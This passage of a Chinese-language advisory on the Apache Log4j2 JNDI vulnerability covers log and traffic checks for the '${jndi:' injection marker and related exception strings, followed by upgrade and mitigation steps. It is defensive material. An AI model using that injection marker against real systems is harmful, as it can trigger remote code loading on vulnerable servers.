攻击者在利用前通常采用dnslog方式进行扫描探测,对于常见利用方式可通过应用系统报错日志中对以下关键字进行排查。
"javax.naming.CommunicationException"
"javax.naming.NamingException: problem generating object using object factory"
"Error looking up JNDI resource"2. 流量排查
- 排查日志或者解码后完整的请求数据包中是否存在${jndi:关键字。
- 排查日志是否存在相关堆栈报错,堆栈里是否有JndiLookup、ldapURLContext、getObjectFactoryFromReference等与 jndi 调用相关的堆栈信息。
0x07 漏洞修复
- 排查应用是否引入了Apache Log4j2 Jar包,若存在依赖引入,则可能存在漏洞影响。尽快升级Apache Log4j2所有相关应用到最新的版本:https://github.com/apache/logging-log4j2
- 缓解措施:
- 添加 jvm 启动参数 -Dlog4j2.formatMsgNoLookups=true
- 在应⽤程序的 classpath 下添加 log4j2.component.properties 配置⽂件⽂件, ⽂件内容:log4j2.formatMsgNoLookups=True
- 移除 log4j-core 包中 JndiLookup 类⽂件并重启服务
- 各大厂商针对log4j2漏洞应急方案集合:https://mp.weixin.qq.com/s/ZbzLc_N26lgUfvS-mM4R2g
参考文章
相关文章
- 【漏洞预警】Apache HTTP CVE-2021-41773目录穿透
- 【说站】为什么推荐大家使用 Nginx 而不是 Apache?
- apache struts2漏洞 但是系统没有用_tomcat ajp漏洞
- CVE-2022-24288:Apache Airflow OS命令注入漏洞
- 一文读懂,硬核 Apache DolphinScheduler3.0 源码解析
- 漏洞扫描与安全加固之Apache Axis组件
- WEB基础:Apache Calcite 实现方言转换的代码
- Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现问题(漏洞预警)
- java 使用apache的net包ftp上传文件详解编程语言
- Apache Commons Lang包的常用方法总结详解编程语言
- 对象池化技术 org.apache.commons.pool详解编程语言
- apache用Linux服务器架设QQ五笔输入法服务:基于Apache技术(qq五笔linux)
- apache深度探索Linux下的Apache服务器(linuxgt)
- Apache Struts2再曝远程代码执行漏洞(S2-046 附PoC)
- 【漏洞预警】Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)
- Apache服务器实现301重定向规则
- Linux下重启Apache简易指令.(linux重启apache命令)
- Apache与MySQL的完美融合开启精彩程序之旅(apache加mysql)
- 《Apache RocketMQ用户指南》之过滤消息示例
- apache日志配置一例
- 如何在Ubuntu下启动Apache的Rewrite功能
- win8下XAMPP中Apache模块无效(apache无法打开)的解决方法
- Apache后缀名解析漏洞分析和防御方法